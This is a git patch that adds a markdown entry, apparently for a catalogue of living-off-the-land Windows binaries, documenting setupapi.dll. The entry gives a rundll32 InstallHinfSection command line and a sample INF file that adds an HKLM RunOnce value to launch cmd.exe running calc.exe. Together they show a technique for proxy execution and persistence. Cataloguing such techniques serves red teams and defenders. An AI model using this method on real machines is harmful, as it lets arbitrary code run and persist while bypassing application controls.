From ea06a6c466baec2702e9dedd303df038ae1c62d4 Mon Sep 17 00:00:00 2001
From: giMini <pabraeken@gmail.com>
Date: Thu, 10 May 2018 20:56:16 -0400
Subject: [PATCH] Create Setupapi.md

---
 OSLibraries/Setupapi.md | 46 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 OSLibraries/Setupapi.md

diff --git a/OSLibraries/Setupapi.md b/OSLibraries/Setupapi.md
new file mode 100644
index 0000000..258f013
--- /dev/null
+++ b/OSLibraries/Setupapi.md
@@ -0,0 +1,46 @@
+## Setupapi.dll
+
+* Functions: Execute
+
+```
+rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf
+```
+
+Acknowledgements:
+* Pierre-Alexandre Braeken - @pabraeken
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/pabraeken/status/994742106852941825
+
+Full path:
+```
+c:\windows\system32\Setupapi.dll
+c:\windows\sysWOW64\Setupapi.dll
+```
+
+
+Notes:
+calc.inf
+```
+; DRIVER.INF
+; Copyright (c) Microsoft Corporation.  All rights reserved.
+ 
+[Version]
+Signature = "$CHICAGO$"
+Class=61883
+ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
+Provider=%Msft%
+DriverVer=06/21/2006,6.1.7600.16385
+ 
+[DestinationDirs]
+DefaultDestDir = 1
+ 
+[DefaultInstall]
+AddReg = CalcStart
+
+[CalcStart]
+HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe"""
+```